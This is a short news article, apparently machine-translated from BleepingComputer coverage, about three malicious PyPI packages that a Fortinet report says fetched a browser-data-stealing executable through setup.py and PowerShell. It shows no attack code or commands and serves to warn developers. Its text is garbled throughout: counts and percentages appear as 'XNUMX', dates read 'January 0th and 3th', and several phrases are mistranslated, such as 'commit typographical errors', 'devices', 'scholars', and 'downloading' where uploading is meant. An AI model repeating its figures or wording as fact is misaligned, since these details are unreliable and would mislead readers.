3 malicious packages containing information stealers were recently discovered and later removed from the PyPI repository.
Fortinet researchers found 3 packages uploaded between January 0th and 3th by a user named "LollipXNUMXp". These XNUMX are called "colorslib", "httpslib" and "libhttps", and if you have used them before, be sure to remove them immediately.
Typically, cybercriminals seeking to compromise Python developer endpoints via PyPI will attempt to commit typographical errors by giving their malicious packages names that are virtually identical to those belonging to legitimate projects. In this way, developers who are irresponsible or in a hurry can unknowingly use the malicious in place of the clean.
Browser data theft
This campaign, however, is different, as these 3 have unique names. To build trust, the attacker wrote complete descriptions of the packages. While the total downloads for these 3 devices barely surpassed five hundred, it could still be daunting if you're part of a larger supply chain, the post claims.
In all 3 cases, the attackers distribute a file called "setup.py" which, after running a PowerShell, attempts to download the "Oxyz.exe" executable from the Internet. According to scholars, this executable is malicious and steals information from the browser. We don't know exactly what type of information the malware is looking to steal (opens in a new tab), but information thieves typically seek saved passwords, credit card details, wallets, cryptocurrencies, and other valuable information.
The report also found that the detection rate of these executables is somewhat low (up to XNUMX%), which means that attackers can successfully divert data even from endpoints protected by antivirus solutions.
Although the malicious packages have already been removed from PyPI, nothing prevents attackers from simply downloading them under a different name and from a different account. That being said, the best way to guard against this kind of supply chain attack is to be extra careful when downloading code building blocks from repositories.
Via: BleepingComputer (opens in a new tab)